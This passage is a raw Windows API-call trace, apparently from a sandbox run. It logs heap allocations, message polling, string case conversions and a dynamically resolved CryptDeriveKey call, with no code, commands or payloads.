0x24b6a08 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.281] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0261.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.283] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0261.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0261.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.283] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.284] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.285] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.285] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0261.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9708 [0261.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9708, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0261.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.291] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.292] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, 